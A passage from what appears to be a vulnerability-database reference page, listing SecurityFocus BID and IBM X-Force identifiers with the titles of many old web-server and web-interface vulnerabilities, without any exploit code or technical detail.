Vulnerability [3715] Nombas ScriptEase:Webserver Edition Default Script Vulnerability [3709] HP-UX 11.04 (VVOS) Virtual Vault/IPlanet Web Server DoS Vulnerability [3698] Webmin Directory Traversal Vulnerability [3685] IBM Tivoli Policy Director WebSeal Denial Of Service Vulnerability [3682] IBM WebSphere JSP Root Password Disclosure Vulnerability [3678] WebGlimpse Character Filtering Arbitrary Command Execution Vulnerability [3677] NOCC Webmail Unauthenticated Outgoing Mail Access [3666] Allaire JRun Web Server Directory Traversal Vulnerability [3655] Kebi WebMail Unauthenticated Administration Vulnerability [3601] Network Associates WebShield SMTP Malformed Mime Header Vulnerability [3592] Allaire JRun Web Root Directory Disclosure Vulnerability [3577] Stronghold Secure Web Server Information Disclosure Vulnerability [3575] IBM Informix Web Datablade Directory Traversal Vulnerability [3568] Oracle9iAS Web Cache HTTP Content Header Denial Of Service Vulnerability [3547] Cisco Local Interface ARP Denial of Service Vulnerability [3511] Xitami Webserver empty GET request DoS Vulnerability [3473] Bradford Barrett Webalizer Cross-Agent Scripting Vulnerability [3469] Microsoft Internet Explorer JavaScript Interface Spoofing Vulnerability [3462] RSA SecurID WebID Debug Mode Information Disclosure Vulnerability [3461] RSA SecurID WebID Unicode Directory Traversal Vulnerability [3459] Webmin Temporary Insecure File Creation Vulnerability [3453] Mountain Network Systems WebCart Command Execution Vulnerability [3449] Oracle9iAS Web Cache Buffer Overflow DoS Vulnerability [3443] Oracle9iAS Web Cache Buffer Overflow Vulnerability [3431] Ipswitch IMail Web Calender Buffer Overflow Vulnerability [3385] Grant Horwood Webodex Remote Arbitrary Code Execution Vulnerability [3373] COM2001 Alexis Server Web Access Plaintext Password Vulnerabilty [3354] Squid Web Proxy Cache Denial of Service Vulnerabilty [3349] IBM WebSphere Application Server Predictable Session ID Vulnerability [3340] WebDiscount E-Shop Remote Arbitrary Command Execution Vulnerability [3328] Textor Webmasters Limited ListRec.pl Input Validation Vulnerability [3296] Baltimore Technologies WEBsweeper Restricted Directory Disclosure Vulnerability [3290] Gauntlet Firewall for Unix and WebShield CSMAP and smap/smapd Buffer Overflow Vulnerability [3228] Respondus for WebCT Weak Password Encryption Vulnerability [3224] A-V Tronics InetServ Webmail Authentication Buffer Overflow Vulnerability [3223] Microsoft Outlook Web Access Denial of Service Vulnerability [3211] JavaServer Web Development Kit v1.0 Directory Traversal Vulnerability [3209] 4D WebServer v6.5.7 Directory Traversal Vulnerability [3206] FreeBSD IPFW Me Point To Point Interface Address Addition Vulnerability [3194] Microsoft IIS WebDAV Invalid Request Denial of Service Vulnerability [3182] Webridge PX Application Suite Internal Server Error Message Vulnerability [3175] SIX-webboard 2.01 File Retrieval Vulnerability [3173] WEBsweeper Unicode Script Filtering Bypass Vulnerability [3172] WEBsweeper Script Filtering Bypass Vulnerability [3161] ZyXEL Prestige Router Administration Interface Vulnerability [3062] Squid Web Proxy Reverse Proxy Vulnerability [3059] Squid Web Proxy Cross-Site Scripting Vulnerability [3050] Cognos Powerplay Web Edition CGI Parameters Vulnerability [3035] Cognos Powerplay Web Edition Weak Temp File Name Vulnerability [3012] Opera Web Browser Malformed Header Vulnerabilty [2995] Basilix Webmail File Disclosure Vulnerability [2987] Cobalt Qube Webmail Directory Traversal Vulnerability [2979] vWebServer Long URL Denial of Service Vulnerability [2978] vWebServer MS DOS Device Name Denial of Service Vulnerability [2975] VWebServer ASP Source Code Disclosure Vulnerability [2969] IBM WebSphere Cross-Site Scripting Vulnerability [2959] Trend Micro InterScan WebManager HttpSave.dll Buffer Overflow Vulnerability [2956] Citrix Nfuse Webroot Disclosure Vulnerability [2945] MacOS Personal Web Sharing Authentication DoS Vulnerability [2938] Gnatsweb Remote Command Execution Vulnerability [2907] Trend Micro InterScan WebManager RegGo.dll Buffer Overflow Vulnerability [2890] Tarantella TTAWebTop.CGI Arbitrary File Viewing Vulnerability [2861] cgiCentral WebStore Arbitrary Command Execution Vulnerability [2860] cgiCentral Webstore Administrator Authentication Bypass Vulnerability [2858] IBM WebSphere Net.Commerce Unprotected Configuration File Vulnerability [2830] iNetLab WebShop Credit Card Exposure Vulnerability [2814] O'Reilly WebBoard Pager Hostile JavaScript Vulnerability [2812] WebTrends Reporting Server Script Source Code Disclosure Vulnerability [2795] Webmin Environment Variable Information Disclosure Vulnerability [2791] TWIG Webmail SQL Query Modification Vulnerability [2740] Apache Web Server HTTP Request Denial of Service Vulnerability [2736] IIS WebDav Lock Method Memory Leak DoS Vulnerability [2732] iPlanet Web Publisher Remote Buffer Overflow Vulnerability [2715] MacOS 9 Personal Web Sharing Remote DoS Vulnerability [2690] Microsoft IIS WebDAV 'Propfind' Server Restart Vulnerability [2676] BRS WebWeaver FTP Root Path Disclosure Vulnerability [2675] BRS WebWeaver Directory Traversal Vulnerability [2665] Excite for Web Servers 1.1 Administrative Password Vulnerability [2664] Mirabilis ICQ Web Front Plug-In DoS Vulnerability [2662] SAP Web Application Server for Linux Arbitrary Command Execution Vulnerability [2660] DataWizard WebXQ Directory Traversal Vulnerability [2659] Tektronix Phaser Network Printer Administration Interface Vulnerability [2653] PowerScripts PlusMail WebConsole Poor Authentication Vulnerability [2650] NetCruiser Software NetCruiser Web Server Path Disclosure Vulnerability [2648] Perl Web Server Path Traversal Vulnerability [2647] Opera Web Browser 5 Warning Dialogue Bypass Vulnerability [2643] Viking Server Relative Path Webroot Escaping Vulnerability [2639] WebCalendar Remote Command Execution Vulnerability [2628] CrossWind CyberScheduler websyncd remote Buffer Overflow Vulnerability [2625] Microsoft Windows WebDAV Scripted Request Vulnerability [2622] Xitami Webserver MS-DOS Device Name DoS Vulnerability [2607] GoAhead Webserver /aux Denial of Service Vulnerability [2600] Microsoft ISA Server Web Proxy DoS Vulnerability [2588] IBM Websphere/Net.Commerce CGI-BIN Macro Denial of Service Vulnerability [2587] IBM Websphere/Net.Commerce Installation Directory Revealing Vulnerability [2568] Alcatel Speed Touch ADSL Insecure Administration Interface Vulnerability [2565] Lotus Domino Web Server HTTP Header DoS Vulnerability [2547] Way to the Web TalkBack.cgi Directory Traversal Vulnerability [2513] BEA Systems WebLogic Server Directory Traversal Vulnerability [2494] Gordano NTMail Web Services DoS Vulnerability [2488] Website Professional Web Directory Disclosure Vulnerability [2483] Microsoft IIS WebDAV 'Search' Denial of Service Vulnerability [2482] IBM Net.Commerce WebSphere Weak Password Vulnerability [2468] Michael Lamont Savant Web Server DoS Vulnerability [2465] Baltimore Technologies WEBsweeper DoS Vulnerability [2461] Cisco Aironet Web Administration Access Vulnerability [2453] Microsoft IIS WebDAV Denial of Service Vulnerability [2432] Orange Web Server DoS Vulnerability [2425] Sapio WebReflex GET Denial Of Service Vulnerability [2416] Netscape Web Publisher Arbitrary Remote File Disclosure Vulnerability [2413] SEDUM HTTP Webserver Denial of Service Vulnerability [2401] IBM Websphere Cross-Site Scripting Vulnerability [2399] Webmin Symlink Vulnerability [2388] Bajie Webserver Remote Command Execution Vulnerability [2386] ITAfrica WEBactive Directory Traversal Vulnerability [2381] John Roy Pi3Web Buffer Overflow Vulnerability [2375] BiblioWeb Remote Buffer Overflow Vulnerability [2373] BiblioWeb Server Directory Traversal Vulnerability [2372] MnSCU/PALS WebPALS Remote Command Execution Vulnerability [2362] SilverPlatter WebSPIRS File Disclosure Vulnerability [2336] Heat-On HSWeb Web Server Path Disclosure Vulnerability [2334] GoAhead WebServer Directory Traversal Vulnerability [2314] iWeb Hyperseek 2000 Directory Traversal Vulnerability [2294] Netscape Enterprise Server Web Publishing DoS Vulnerability [2281] Mountain-net WebCart Exposed Orders Vulnerability [2269] Microsoft Index Server Webhits.dll ASP Source Disclosure Vulnerability [2268] LocalWEB2000 Directory Traversal Vulnerability [2248] Excite for Web Servers 1.1 Command Execution Vulnerability [2216] Apache Web Server DoS Vulnerability [2200] Compaq Web Admin Buffer Overflow Vulnerability [2199] Microsoft Web Client Extender NTLM Authentication Vulnerability [2198] Basilix Webmail Incorrect File Permissions Vulnerability [2178] WebMaster ConferenceRoom Developer Edition DoS Vulnerability [2175] IBM HTTP Server AfpaCache/WebSphereNet.Data DoS Vulnerability [2171] Oracle Apache+WebDB Documented Backdoor Vulnerability [2168] Informix Webdriver Local File Overwrite Vulnerability [2166] Informix Webdriver Remote Administration Access Vulnerability [2138] BEA WebLogic Server Double Dot Buffer Overflow Vulnerability [2078] OReilly WebSite 1.x/2.0 win-c-sample.exe Buffer Overflow Vulnerability [2077] WEBgais websendmail Remote Command Execution Vulnerability [2076] Novell Netware Web Server 3.x files.pl Vulnerability [2060] Apache Web Server with Php 3 File Disclosure Vulnerability [2058] WEBgais Remote Command Execution Vulnerability [2047] phpWebLog Administrator Authentication Bypass Vulnerability [2029] Trlinux Postaci Webmail Password Disclosure Vulnerability [2026] GlimpseHTTP and WebGlimpse Piped Command Vulnerability [2025] Novell NetWare Web Server 2.x convert.bas Vulnerability [2024] Webcom Datakommunikation CGI Guestbook rguest/wguest Vulnerability [2012] Cisco 600 Series Web Administration Denial of Service Vulnerability [2011] Ipswitch IMail Web Service HOST Denial Of Service Vulnerability [1999] Network Associates WebShield SMTP Invalid Outgoing Recipient Field DoS Vulnerability [1993] Network Associates WebShield SMTP Content Filter Bypass Vulnerability [1896] WebObjects Remote Overflow Vulnerability [1891] Sun JavaWebServer Viewable .jhtml Source Vulnerability [1888] CS&T CorporateTime for the Web Brute Force Vulnerability [1848] iPlanet Webserver .shtml Buffer Overflow Vulnerability [1822] 4D Inc. WebSTAR DoS Vulnerability [1793] Microsoft Internet Explorer Cached Web Credentials Disclosure Vulnerability [1776] Bytes Interactive Web Shopper Directory Traversal Vulnerability [1774] Extropia WebStore Directory Traversal Vulnerability [1770] Boa Webserver 0.94.2.x File Disclosure Vulnerability [1763] IBM WebSphere ikeyman Weak Encrypted Password Vulnerability [1732] WebTeacher WebData File Import Vulnerability [1725] Talentsoft Web+ Example Script File Disclosure Vulnerability [1722] Talentsoft Web+ Source Code Disclosure Vulnerability [1720] Talentsoft Web+ Internal IP Address Disclosure Vulnerability [1691] WebSphere Application Server Plugin DoS Vulnerability [1671] Microsoft WebTV DoS Vulnerability [1656] SuSE Apache WebDAV Directory Listings Vulnerability [1648] QNX Voyager Webserver Multiple Vulnerabilities [1640] Gordano NTMail Web Configuration DoS Vulnerability [1611] O'Reilly WebSite Pro Write Access Vulnerability [1600] Sun Java Web Server Web Admin / Bullettin Board Vulnerability [1589] Network Associates WebShield SMTP Trailing Period DoS Vulnerability [1581] HP OpenView Network Node Manager 6.1 Web Password Vulnerability [1570] BEA Weblogic Proxy Multiple Buffer Overflow Vulnerabilities [1554] Solaris AnswerBook2 Administration Interface Access Vulnerability [1525] Weblogic Remote Command Execution Vulnerability [1522] Bajie Webserver File Reading Vulnerability [1521] Bajie Webserver Absolute Path Disclosure Vulnerability [1518] Weblogic FileServlet Show Code Vulnerability [1517] Weblogic SSIServlet Show Code Vulnerability [1510] Roxen WebServer %00 Request File/Directory Disclosure Vulnerability [1500] IBM WebSphere Showcode Vulnerability [1498] Default Sun Java Web Server Servlets Vulnerability [1497] WEBactive HTTP Server Default Log Vulnerability [1492] O'Reilly WebSite GET Buffer Overflow Vulnerability [1490] L-Soft Listserv 1.8c and 1.8d Web Archives Long QUERY_STRING Buffer Overflow Vulnerability [1487] O'Reilly WebSite 'webfind.exe' Buffer Overflow Vulnerability [1485] CSM Alibaba Web Server Piped Command Vulnerability [1482] CSM Alibaba Web Server DoS Vulnerability [1470] WEBactive HTTP Server Long GET Request Vulnerability [1469] CVSWeb insecure perl open Vulnerability [1463] ICQ Web Front Remote DoS Attack Vulnerability [1459] Sun Java Web Server Vulnerability [1453] Savant Web Server Buffer Overflow Vulnerability [1427] Oracle Web Listener Denial of Service Vulnerability [1423] LocalWEB HTTP Buffer Overflow Vulnerability [1422] Webmin Multiple SSL Session Requests Denial of Service Vulnerability [1410] Network Associates WebShield SMTP Filtering Rules Bypass Vulnerability [1391] Netwin DMailWeb & CWMail Server DoS Vulnerability [1390] Netwin DMailWeb & CWMail Server Mail Relaying Vulnerability [1378] BEA Systems WebLogic Server and Express Source Code Disclosure Vulnerability [1376] Netwin DMailWeb & CWMail Multiple DoS Vulnerabilities [1365] WebBBS Web Server Multiple Buffer Overflow Vulnerability [1347] Extropia WebBanner Input Validation Vulnerability [1313] Savant Web Server CGI Source Code Disclosure Vulnerability [1286] Concatus IMate Web Mail Server 2.5 Buffer Overflow Vulnerability [1254] Network Associates WebShield SMTP 4.5.44 Buffer Overflow Vulnerability [1253] Network Associates WebShield SMTP Configuration Modification Vulnerability [1246] HP Web JetAdmin 6.0 Printing DoS Vulnerability [1243] HP Web JetAdmin Directory Traversal Vulnerability [1238] Cobalt RaQ2/RaQ3 Web Server Appliance cgiwrap bypass Vulnerability [1237] Multiple Vendor Web Shopping Cart Hidden Form Field Vulnerability [1171] Netwin Dmailweb Server utoken Buffer Overflow Vulnerability [1167] L-Soft Listserv 1.8 Web Archives Buffer Overflow Vulnerability [1159] FileMaker Pro 5.0 Web Companion Software Multiple Vulnerabilities [1102] TalentSoft Web+ Directory Traversal Vulnerability [1099] Tiny WinRoute 3.04 Web Administration Authentication Bypass [1075] Netscape Enterprise Server Web Publishing Vulnerability [1056] Atrium Software Mercur WebView WebMail-Client Buffer Overflow Vulnerability [1053] Oracle Web Listener Batch File Vulnerability [977] Zeus Web Server Null Terminated Strings Vulnerability [969] Progress WebSpeed Administration Utility Configuration Vulnerability [953] Rightfax Webclient Predictable Session Number Vulnerability [949] InetServ 3.0 WebMail Long GET Request Vulnerability [932] Website Professional Directory Revealing Vulnerability [915] Allaire Spectra 1.0 Webtop Vulnerability [897] Savant Web Server NULL Vulnerability [892] WebWho+ Remote Command Execution Vulnerability [881] Lotus Notes Domino Webserver CGI Vulnerabilities [879] Novell GroupWise GWWEB.EXE Multiple Vulnerabilities [860] Communigate Pro Web Admin DoS Vulnerability [844] IBM Websphere Installation Permissions Vulnerability [841] Oracle Web Listener URL Character Substitution Vulnerability [820] Mdaemon WebConfig Overflow DoS Vulnerability [816] Sun Java IDE Webserver IP Restriction Failure Vulnerability [814] HP JetDirect Internal Webserver Long URL DoS Vulnerability [806] Tektronix PhaserLink Webserver Vulnerability [803] WebBBS login & password Buffer Overflow Vulnerability [743] Falcon Web Server Directory Traversal Vulnerability [742] Zeus Webserver Possible Remote root Compromise [741] Squid Web Proxy Authentication Failure Vulnerability [699] Jana Webserver Directory Traversal Vulnerability [698] WebTrends Enterprise Reporting Server Multiple Vulnerabilities [623] Sapphire/Web Authentication Vulnerability [577] WebRamp Default Adminstrative Login Vulnerability [569] WebTrends Enterprise Reporting Server Negative Content Length DoS Vulnerability [565] DPEC Courseware Web Server Password Vulnerability [513] WebTrends Multiple Products Stored Password Vulnerability [505] Ipswitch IMail Web Service Buffer Overflow DoS Vulnerability [491] Cognos Powerplay Web Edition Dynamic Directory Vulnerability [374] IRIX cgi-bin webdist.cgi Vulnerabilty [282] Compaq Management Agents Web File Access Vulnerability [281] Computalynx CMail Web File Access Vulnerability [280] Floosietek FTGate Web File Access Vulnerability [279] Gordano NTMail Web File Access Vulnerability [278] SmartDesk WebSuite Buffer Overflow Vulnerability [273] Netscape Web Server %20 Filename Vulnerability [253] Solaris ab2 (DynaWeb) Server DoS & Possible Trojan Vulnerability [194] NT IIS IISAPI Extension Enumerate Root Web Server Directory Vulnerability [189] NT IIS4 Remote Web-Based Administration Vulnerability [135] NT Webserver Long File Name Access Protection Vulnerability [98] Webmin Password Brute Force Vulnerability [84] Apple Personal Web Sharing Vulnerability IBM X-Force - https://exchange.xforce.ibmcloud.com: [85624] Cisco Secure Access Control System Web interface cross-site scripting [84930] AirLive IP cameras web interface cross-site request forgery [84923] Sony CH and DH series IP cameras Web interface cross-site request forgery [84101] OpenVPN Access Server CVE-2013-2692 Admin web interface cross-site request forgery [83290] Easy FTP Server web interface denial of service [82584] Foscam Firmware web interface directory traversal [82123] Niagara AX web interface directory traversal [82042] Cisco Unified MeetingPlace Server web interface cross-site request forgery [80681] Huawei E585 web management interface security bypass [80272] IBM System Storage TS3500 Tape Library Web interface privilege escalation [77978] McAfee Email and Web Security Web interface directory traversal [76310] PacketFence Web Admin Guest Management interface module cross-site scripting [75355] Websense TRITON Report Management Interface favorites.exe authentication bypass [75354] Websense TRITON Report Management Interface detail.exe cross-site scripting [74624] TP-Link 8840T DSL Router web interface security bypass [73534] Multiple IBM products Web interface cross-site request forgery [73109] Enigma2 Webinterface directory traversal [72919] Emobile Pocket Wifi GP02 Web Interface cross-site forgery [72822] Mibew Messenger web interface ban.php and settings.php cross-site request forgery [72784] Inquisiq R3 LMS web interface cross-site request forgery [72235] Enigma2 Webinterface information disclosure [71849] Websense report management interface cross-site scripting [70922] McAfee Web Gateway web interface cross-site scripting [68861] Dlink DPH IP phones Web management interface denial of service [68860] D-Link DPH IP phones Web management interface security bypass [68859] D-Link DPH IP phones Web management interface [68858] D-Link DPH IP phones Web management interface file upload [67836] Cherokee admin web interface cross-site request forgery [66478] Open Ticket Request System web-interface security bypass [64245] Afaria web management interface cross-site request forgery [64138] GIT gitweb interface cross-site scripting [63927] Citrix Web Interface unspecified cross-site scripting [63637] VMware Server VI Web Access interface directory traversal [63451] JDownloader Webinterface source disclosure [63339] Cisco Unified Videoconferencing Web interface session hijacking [63338] Cisco Unified Videoconferencing Web interface unauthorized access [60775] UPlusFtp Server Web interface buffer overflow [59689] Trend Micro InterScan Web Security Virtual Appliance interface cross-site request forgery [59455] Apple Mac OS X CUPS Web interface cross-site request forgery [59056] Accoria Rock Web Server interface cross-site request forgery [59053] Accoria Rock Web Server interface brute force [58855] Cisco DPC2100 Web interface cross-site request forgery [57221] IBM Web Interface for Content Management cookies unspecified [57220] IBM Web Interface for Content Management unspecified cross-site scripting [57019] Citrix Web Interface source disclosure [56896] chumby Web interface command execution [56490] CA eHealth Performance Manager Web interface cross-site scripting [56389] LiteSpeed Web Server Admin interface cross-site scripting [55712] Novatel MiFi Web interface cross-site request forgery [54639] CA Service Desk Web interface cross-site scripting [53069] BitTorrent and uTorrent Web interface denial of service [52976] VMware Studio Web interface directory traversal [52905] Xerox WorkCentre Web Services Extensible Interface Platform information disclosure [52020] BEA WebLogic Administrative Interface [51522] Huawei D100 Web and telnet interface default password [50939] LogMeIn Pro Web interface cross-site request forgery [50673] IPcelerate IPsession Web interface SQL injection [50507] Transmission Web interface cross-site request forgery [50191] Citrix Web Interface unspecified cross-site scripting [49921] Apache ActiveMQ Web interface cross-site scripting [49601] Nokia Siemens Flexi ISN Web interface security bypass [49249] VLC Media Player Web interface status.xml input parameter buffer overflow [46983] IBM Rational ClearCase Web interface cross-site scripting [46773] CUPS Web interface weak security [46625] Cobbler Web interface code execution [46602] NETGEAR WGR614 Wireless DSL router Web interface denial of service [46256] A-LINK WL54AP3 and WL54AP2 Web interface cross-site request forgery [46135] Citrix Web Interface security bypass [46118] KTorrent Web interface PHP code execution [46117] KTorrent Web interface weak security [46023] Sun Integrated Lights-Out Manager (ILOM) Web interface security bypass [44995] Samsung DVR SHR2040 Web interface denial of service [44885] PageR Enterprise Web interface directory traversal [44874] Belkin Wireless G F5D7632-4V6 router Web interface security bypass [44788] Dreambox DM500 Web interface denial of service [44518] MailScan for Mail Servers Web administration interface security bypass [44517] MailScan for Mail Servers Web administration interface cross-site scripting [44514] MailScan for Mail Servers Web administration interface directory traversal [43949] Multiple Century Systems routers Web interface cross-site request forgery [43326] Novell Groupwise WebAccess simple interface cross-site scripting [42769] Alt-N SecurityGateway Web interface buffer overflow [42748] Xerox DocuShare dsweb interface cross-site scripting [41328] IBM Rational ClearQuest Web interface cross-site scripting [41171] Snom-320 SIP Phone Web interface unauthorized access [41125] D-Link DI-524 router Web interface denial of service [41052] Airspan WiMAX ProST Web interface security bypass [40456] Intermate WinIPDS Web interface directory traversal [40176] Xerox WorkCentre and WorkCentre Pro Web User Interface security bypass [39252] VLC media player Web interface format string [39123] Citrix Web Interface unspecified cross-site scripting [38975] BarracudaDrive Web Server admin interface cross-site scripting [38646] Citrix NetScaler Web management interface information disclosure [38320] Cerberus FTP Server Web interface cross-site scripting [38231] Multiple Avaya Messaging Products Web interface denial of service [37216] NETGEAR ProSafe SSL VPN Concentrator 25 Web interface cross-site scripting [36244] Bugzilla WebService (XML-RPC) interface information disclosure [35665] Pay Roll - Time Sheet and Punch Card Application With Web Interface login.asp SQL injection [35264] Fujitsu PRIMERGY BX300 Web interface information disclosure [34773] Blue Coat K9 Web Protection Web management interface buffer overflow [34254] TeamSpeak WebAdmin interface privilege escalation [32940] AstroCam Web interface denial of service [32876] Trend Micro ServerProtect for Linux Web interface information disclosure [30781] J-OWAMP web interface JOWAMP_files/execInBackground.php command execution [30775] J-OWAMP web interface JOWAMP_ShowPage.php file include [30174] Network Administration Visualized Web interface code execution [29056] Cisco IDS/IPS Web interface SSL denial of service [28113] VMware ESX Server Web management interface cross-site request forgery [27948] Siemens SpeedStream Web administrative interface denial of service [27688] Cisco Router Web Setup (CRWS) IOS HTTP interface command execution [27645] Juniper Networks DX Web interface cross-site scripting [27225] Cisco CallManager Web interface cross-site scripting [26123] OCE 3121/3122 Web management interface long URL denial of service [25883] CiscoWorks WLSE Web interface archiveApplyDisplay.jsp cross-site scripting [25325] BorderWare MXtreme Web administration interface unauthorized access [23628] Nortel SSL VPN Web interface cross-site scripting [23183] PowerChute Network Shutdown Web interface weak security [18007] NETGEAR DG834G administrative Web interface denial of service [16497] 3Com SuperStack 4400 Switches Web management interface denial of service [15745] F-Secure Backweb user interface allows elevated privileges [15001] SurgeFTP Web interface denial of service [12723] HP Color LaserJet 4550 allows an attacker to gain access to Web administration interface [12510] Axis Web interface of Axis 560 and Axis 5600+ print servers denial of service [12306] SLMail administrative Web interface information disclosure [11845] Sambar Server Pro Server WebMail interface transmits password and username in plain text [11596] NETGEAR FVS318 Web interface denial of service [11310] Abyss Web Server Web management interface brute force [10793] Linksys EtherFast Web management interface multiple heap buffer overflows [10792] Linksys EtherFast Web management interface multiple stack buffer overflows [10319] SurfControl SuperScout Email Filter Administrative Web interface error message cross-site scripting [10301] ArGoSoft Mail Server Pro Web mail interface cross-site scripting [9703] D-Link DP-300+ Web interface POST request denial of service [9564] Pingtel xpressa Web interface can be used to cause a denial of service [9560] Novell NetMail Web interface ModWeb and WebAdmin buffer overflow [9265] Red-M 1050AP access point Web interface insecure session [9262] Red-M 1050AP access point Web interface denial of service [9092] AstroCam Web administrative interface buffer overflow [9083] Cisco CSS Web management interface invalid HTTP request denial of service [9057] Cisco ATA-186 Web interface authentication bypass [9056] Cisco ATA-186 Web interface could reveal sensitive information [9054] Critical Path InJoin Directory Server Web administrative interface (iCon) could allow an attacker to view files [9053] Critical Path InJoin Directory Server Web administrative interface (iCon) cross-site scripting [8651] OpenKeyServer Web interface cross-site scripting [8452] Oracle9i Application Server PL/SQL gateway administration Web interface has no authentication [8300] BPM Studio Pro Web management interface &quot [8299] BPM Studio Pro Web management interface DOS device request denial of service [8261] Squid Web Proxy Cache HTCP interface is always enabled [8260] Squid Web Proxy Cache SNMP interface denial of service [8082] NETGEAR Gateway Router Web interface cross-site scripting [7835] CacheOS incecure Web interface could allow a remote attacker to view sensitive information [7203] PGP Keyserver denial of service using Web interface [7022] Inetserv Webmail interface buffer overflow [6631] Cisco CSS Web management interface authentication bypass [6482] Tektronix PhaserLink Web server allows access to admin interface with no authentication [5058] Sun Solaris AnswerBook2 Web interface could allow remote execution [4123] Trend Micro OfficeScan Web interface allows unauthenticated users to perform administrative functions [2288] CMail mail server Web interface can be used to verify system usernames [2241] FTGate Web interface allows remote attackers to read files from the system [2239] CMail Web interface can expose files [1886] Cisco Web configuration interface can be crashed [1845] Cisco equipment is configurable via a built-in Web interface [86378] Google Chrome WebVTTParser::createDocumentFragmentFromCueText denial of service [86377] Copy to WebDAV application for iPad and iPhone Index File Dir Listing module command execution [86376] Copy to WebDAV application for iPad and iPhone Upload module file upload [86375] Copy to WebDAV application for iPad and iPhone Upload module file include [86356] Cisco Finesse interface information disclosure [86326] Monster Menus module for Drupal mm_webform security bypass [86315] RESTful Web Services module for Drupal multiple security bypass [86289] TrustPort WebFilter help.php directory traversal [86280] Mozilla Firefox, Thunderbird and SeaMonkey Web Workers security bypass [86250] ownCloud Share Interface cross-site scripting [86249] ownCloud user_webdavauth security bypass [86234] Google Web Toolkit HTMl files cross-site scripting [86196] INSTEON Hub web and API authentication bypass [86182] Cisco Unified Communications Manager User WebDialer page cross-site request forgery [86177] Cisco Unified Communications Manager Web portal information disclosure [86150] Cisco WebEx Meeting Center information disclosure [86142] Cisco WebEx Meetings Server status security bypass [86105] Siemens Scalance W-700 Series interface security bypass [86050] GE Proficy HMI/SCADA - CIMPLICITY CimWebServer buffer overflow [86037] WebDisk application for iPad and iPhone Index File Dir Listing module command execution [85990] Symantec Web Gateway CVE-2013-4673 command execution [85988] Symantec Web Gateway CVE-2013-4672 command execution [85987] Symantec Web Gateway CVE-2013-4671 cross-site request forgery [85986] Symantec Web Gateway blocked.php cross-site scripting [85985] Symantec Web Gateway CVE-2013-1617 SQL injection [85984] Symantec Web Gateway CVE-2013-1616 command execution [85915] AutoWeb news.php SQL injection [85874] Apache OFBiz Webtools View Log screen cross-site scripting [85822] Roundcube Webmail identity configuration page cross-site scripting [85783] Huawei E587 3G Mobile Hotspot Web UI cross-site scripting [85782] Huawei E587 3G Mobile Hotspot Web UI command execution [85707] Oracle Secure Global Desktop Web UI unspecified [85706] Oracle Secure Global Desktop Web UI unspecified [85674] Oracle Agile PLM Framework Web Client (CS) unspecified [85666] Oracle Enterprise Manager Grid Control User Interface Framework unspecified [85661] Oracle WebCenter Content Web Forms unspecified [85660] Oracle WebCenter Content Site Studio unspecified [85658] Oracle WebCenter Content Server unspecified [85567] Intelligent Platform Management Interface information disclosure [85566] Intelligent Platform Management Interface security bypass [85520] Avira Analysis Web Service overview page SQL injection [85512] dl Download Ticket Service REST interface cross-site request forgery [85424] Cisco IronPort Web Security Appliance cross-site request forgery [85392] Nameko Webmail nameko.php cross-site scripting [85377] libvirt libvirtd virConnectListAllInterfaces denial of service [85341] KENT-WEB CLIP-MAIL unspecified cross-site scripting [85340] KENT-WEB POST-MAIL unspecified cross-site scripting [85339] Juniper Junos J-Web command execution [85285] Cisco Web Security Appliance CVE-2013-3386 denial of service [85284] Cisco Web Security Appliance CVE-2013-3385 denial of service [85283] Cisco Web Security Appliance CVE-2013-3384 command execution [85282] Cisco Web Security Appliance command execution [85162] Cisco WebEx Social cross-site request forgery [85072] Facebook Mobile web application appreg.php open redirection [85004] Angel Browser application for Android WebView class information disclosure [85003] Galapagos Browser application for Android WebView class information disclosure [84940] TESO Web default.asp SQL injection [84929] KNet Web Server banned log parser denial of service [84878] Resin Professional Web And Application Server file parameter information disclosure [84875] Resin Professional Web And Application Server index.php cross-site scripting [84833] FileMaker Pro and FileMaker Pro Advanced Instant Web Publish function cross-site scripting [84795] Apple WebKit CVE-2013-1023 code execution [84794] Apple WebKit CVE-2013-1013 security bypass [84793] Apple WebKit CVE-2013-1012 cross-site scripting [84766] Cisco WebEx Meetings Server information disclosure [84685] Telaen webroot leak path disclosure [84628] Webform module for Drupal components label cross-site scripting [84624] IntraSrv Simple Web Server seh code execution [84594] IBM WebSphere MQ CHLAUTH rule bypass [84564] IBM WebSphere MQ mqm buffer overflow [84529] Siemens Solid Edge ST5 WebPartHelper ActiveX control command execution [84522] Cisco WebEx for iOS spoofing [84384] web2py CVE-2013-2311 share.js cross-site scripting [84374] Wireshark Websocket dissector denial of service [84373] Wireshark Websocket dissector denial of service [84362] IBM WebSphere Application Server process initialization privilege escalation [84352] Stanford WebAuth header state information disclosure [84340] Apple WebKit code execution [84339] Apple WebKit code execution [84338] Apple WebKit code execution [84337] Apple WebKit code execution [84336] Apple WebKit code execution [84335] Apple WebKit code execution [84334] Apple WebKit code execution [84333] Apple WebKit code execution [84332] Apple WebKit code execution [84331] Apple WebKit code execution [84330] Apple WebKit code execution [84329] Apple WebKit code execution [84328] Apple WebKit code execution [84327] Apple WebKit code execution [84326] Apple WebKit code execution [84325] Apple WebKit code execution [84324] Apple WebKit code execution [84323] Apple WebKit code execution [84322] Apple WebKit code execution [84321] Apple WebKit code execution [84295] MiniWeb Content-Length header denial of service [84270] Cisco WebEx Social security bypass [84268] Cisco WebEx Social cross-site scripting [84113] IBM Data Studio Web Console cross-site request forgery [84063] NetApp OnCommand System Manager CVE-2013-3322 Halt/Reboot interface command execution [84024] WeBid yourauctions_p.php SQL injection [84023] WeBid loader.php file disclosure [84012] Cisco WebEx Meetings information disclosure [83999] Beat Websites beats.php SQL injection [83988] Cisco Unified MeetingPlace and Cisco WebEx Meetings information disclosure [83973] IBM Data Studio Web Console directory traversal [83965] IBM WebSphere Application Server Administrative console information disclosure [83871] IBM WebSphere Application Server Administrative console cross-site scripting [83868] IBM WebSphere Cast Iron unauthorized access [83742] All in One Webmaster plugin for WordPress HTTP request cross-site request forgery [83714] MinaliC Webserver HTTP Post method buffer overflow [83642] IcedTea-Web Plugin security bypass [83640] IcedTea-Web Plugin security bypass [83621] IBM WebSphere Portal trace file password disclosure [83618] IBM WebSphere Portal HTTP response splitting [83617] IBM WebSphere DataPower XC10 security bypass [83609] IBM WebSphere Application Server OAuth cross-site scripting [83607] pd-admin WebFTP Overview page cross-site scripting [83581] Oracle Java WebStart ActiveX launchApp() code execution [83568] Oracle Java JavaFX WebPage class code execution [83530] Oracle GlassFish Server REST Interface unspecified [83529] Oracle GlassFish Server ADMIN Interface unspecified [83512] Oracle Primavera P6 Enterprise Project Portfolio Management Web Access unspecified [83511] Oracle Primavera P6 Enterprise Project Portfolio Management Web Access unspecified [83460] Oracle WebCenter Content Content Server information 